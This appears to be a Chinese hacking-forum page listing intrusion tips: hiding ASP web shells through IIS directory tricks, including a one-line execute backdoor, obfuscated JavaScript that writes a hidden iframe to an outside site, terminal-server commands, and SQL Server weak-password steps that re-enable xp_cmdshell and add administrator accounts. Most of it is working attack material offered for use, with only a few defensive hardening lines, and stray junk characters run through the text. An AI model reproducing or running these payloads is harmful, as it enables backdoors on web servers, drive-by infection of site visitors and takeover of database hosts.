执行后可以用AT命令查看新加的任务
# V8 d" R7 T' X用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。9 `: L7 Q, P. K' f

" n2 b8 r- A. p53、隐藏ASP后门的两种方法/ B) J" X7 l3 ^% y3 v
1、建立非标准目录:mkdir images..\
' L- S2 v4 g) z拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp" B# e8 T$ V7 V6 ~) k" m
通过web访问ASP木马:http://ip/images../news.asp?action=login
: t- P& ^7 A* T( x% T如何删除非标准目录:rmdir images..\ /s
/ m( j/ @# I1 g0 D. Q2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:) i5 o5 C+ j; s6 h( P  A& j% u
mkdir programme.asp
7 t' k+ S5 u( Z新建1.txt文件内容:<!--#include file=”12.jpg”-->7 a. w" ^" B9 ~# A# S1 c% \; \5 b
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
9 D" a  p; D, I8 G2 h6 s, c; \attrib +H +S programme.asp
1 A* r, G6 c2 K, D5 {/ k- \通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
" }3 f# S' O* b, q) |- C+ ~# h/ `% i
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
0 J! i- n" G' R& Q! T, J" O然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
5 q9 k: _+ N  u: w) @! I- ?. X# `' F
55、JS隐蔽挂马
  t1 o) h1 G  b$ J$ \1.
/ d% P. Z5 y" \- F% [var tr4c3="<iframe src=ht";
5 V7 d% ~/ {' W/ d" L# }tr4c3 = tr4c3+"tp:/";$ u/ s  j' E" e6 o3 b! f% [7 M
tr4c3 = tr4c3+"/ww";
2 X$ |/ A6 Y" f  N% y$ itr4c3 = tr4c3+"w.tr4";# A, m8 ]. |/ r8 [* G5 g
tr4c3 = tr4c3+"c3.com/inc/m";: Y! t# E# Z9 H3 w( }
tr4c3 = tr4c3+"m.htm style="display:none"></i";% D$ N& g; _) B* O8 j: ]
tr4c3 =tr4c3+"frame>'";
5 u0 d; @; E" ?' ^) wdocument.write(tr4c3);2 v3 S' o* m3 }; K9 g
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
# @0 `  C% N& Y6 r4 v
) s+ M' J- J( u/ {2.  f5 S9 F8 |4 y6 d2 E
转换进制,然后用EVAL执行。如- l* \! E6 h7 f4 r: Y
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 H; E5 R6 `$ U* |" t* T
不过这个有点显眼。
3 L7 Z( ]; N5 k! X% j3.
  @( K9 l& E: @+ A- t4 xdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' |+ g4 r) O) T* s& Q最后一点,别忘了把文件的时间也修改下。
* u8 D( j% _2 T/ O0 F
8 I  a$ w" Z' ?4 p  b56.3389终端入侵常用DOS命令2 N! ]/ o& Z7 ?5 p* f
taskkill taskkill /PID 1248 /t
9 |; b8 J7 c* @( W% K! [
& w. j( n: b$ ?$ ytasklist 查进程" X: z2 ^6 W4 K' @+ N% o; b' P7 w8 R
/ @. @. [8 z* E8 j1 b
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" {' o  P$ L( V) V! x2 L
iisreset /reboot+ @8 U0 m! X% k( U) X; f  e
tsshutdn /reboot /delay:1    重起服务器" Z' \! x+ X- Z
' t  H, @5 q+ |8 c
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ U, q; F- ?( B4 N5 O! o0 p" X* t! W( C( Q# ^: q7 c) `& q
query user 查看当前终端用户在线情况
! e# G6 r$ M, G7 ^: y
; \  i  ~  a4 i  q# L" b- R1 N& S& z要显示有关所有会话使用的进程的信息,请键入:query process *
" k6 L5 k8 h/ m# y: X7 j# u, Y- n! W& J, X
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:23 G6 Z( u  P' v1 @1 [

" q, h( q" u% H) b要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
. d& _4 m; t; _
! u# u! c5 w% d9 x4 R要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 _* m2 W( m+ u; H8 U5 r0 D4 z& O8 N5 i4 U7 N
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启% n( z0 h: G* J2 k: A, p
$ x9 L1 [/ ~- C/ t- l% v
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统; G+ ~" ~, [, |; q8 q" j

/ e; l3 U. D0 p  K0 U3 U/ v7 J0 O命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
# _3 x0 s9 u9 Q/ r  G2 R8 D+ f' i+ w) s
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机& H1 Q7 x  m6 T( G
: T# ~7 ^& ~: Z. x* O2 r$ b
56、在地址栏或按Ctrl+O,输入:& P( Y* j7 `, H4 I
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;4 z& d8 p) I( q6 e
8 d" C/ u6 Y! [4 n
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。' M* o7 ]1 n& V4 a
" d( p* Q5 |4 i! x7 B0 w
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,3 k+ N6 d5 _0 \! h4 p2 T7 G% k) V
用net localgroup administrators是可以看到管理组下,加了$的用户的。- b7 k* x9 A% O$ {  f. X
4 ~/ v/ j  N, M8 e1 I7 K$ Z; v
58、 sa弱口令相关命令
  a5 m2 C$ f7 K6 c$ ^$ ~7 n9 f% n6 q; O* W
一.更改sa口令方法:7 M0 E% A6 L  G, d, \
用sql综合利用工具连接后,执行命令:( w, r: Y* j/ D: y! D- i  e: I" T
exec sp_password NULL,'20001001','sa'
  \' |* x0 v: P- o2 w6 Q1 v(提示:慎用!)6 i4 j, c' @+ m# f# O

! e5 r$ ]3 v+ D5 r. h) z/ ^/ I二.简单修补sa弱口令.* @0 Q1 t- C6 V$ M, Q9 |( L

7 ]! W3 D  r2 ~+ W3 j) M. }5 S方法1:查询分离器连接后执行:/ j1 [0 s- m4 O/ P% _
if exists (select * from
9 a$ x: a3 U: t/ I4 c6 Odbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and  a! A) }* }+ i: L
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
, c5 a/ R+ D4 a& F9 O9 t2 ^1 o
, t& |$ R2 D, d( U9 [, z9 gexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'/ K. g; f3 m: V

7 P9 x% ~9 @. c7 F/ Q9 Y# n/ V7 tGO; ?+ e* a4 f/ P/ G  O
7 [0 S3 C/ J# a6 ?, Z$ b
然后按F5键命令执行完毕* ^* R* K, N& \! |* Y8 {- l

' g1 Z* L9 e, t方法2:查询分离器连接后
7 x) t$ e9 X5 G3 d第一步执行:use master
; L# }' Z" ]! L$ E第二步执行:sp_dropextendedproc 'xp_cmdshell'& }6 E! A0 G: c3 a2 F, o$ V
然后按F5键命令执行完毕7 C' N: D7 c! _, D# d

9 R" t2 S+ P- t: Y. v% U1 L$ t0 W0 \
三.常见情况恢复执行xp_cmdshell.
  r2 E; ]+ c& T0 r1 ~
& Z! i* ?% t) v6 F* t
# q% ~7 k6 o5 w1 未能找到存储过程'master..xpcmdshell'.
3 {% p4 ~; H8 ?5 l. M2 q8 D   恢复方法:查询分离器连接后,
; e3 w, m. }+ J/ |第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ e7 P' Q9 {. Y7 @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'; ~$ ]! ?# p" v) s
然后按F5键命令执行完毕6 {. l8 e) v) I; N) |: C
$ h/ J6 [6 ?; \* m9 ]+ R
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
" ?; s( x0 B' t恢复方法:查询分离器连接后,8 |/ s% k8 c6 P: A+ T0 l& M' n
第一步执行:sp_dropextendedproc "xp_cmdshell"
! T6 a: B* j& ?# I$ ~; p第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
" U7 C" `5 }% T4 p+ x然后按F5键命令执行完毕/ r% y, |) H4 z) f+ R
& m/ v& ^9 z) d
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" J, e* x( e% ]( y8 J0 \. d恢复方法:查询分离器连接后,5 ?% v# I( T! U6 e4 T8 H- Z2 H
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% c& T2 J  Y; d9 n7 }第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
& |8 ]' `8 }- @9 H. P然后按F5键命令执行完毕' @+ p* ^5 d% g. s- Z1 {* M& k

3 w5 _( ?$ I( U! T/ E( _  M2 f四.终极方法.9 R! i( Y; v  Q$ ~
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:4 O% v6 c+ A. i0 S1 L/ g# t
查询分离器连接后,; n6 P9 c  q) {9 @8 K, e
2000servser系统:7 P# x$ t; q: R
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'8 h+ H) B9 n" A2 T1 S& Z( }9 O
7 X+ f  ^: I  g. L" g  ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'( I2 D; h! o4 I' N) t3 t

  o( ?' z6 l8 A3 z, _/ _/ T, g( txp或2003server系统:
& R! S# [, E7 n2 R( O* h0 W4 k: b( f
3 H- C3 a6 ^5 @4 m! z' Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
) C- ]' `/ @: M: z* P0 T3 O& Y' P. f* p' [: `* N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'! y% w8 i1 c2 R# t% Z1 Z% y4 F; r





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2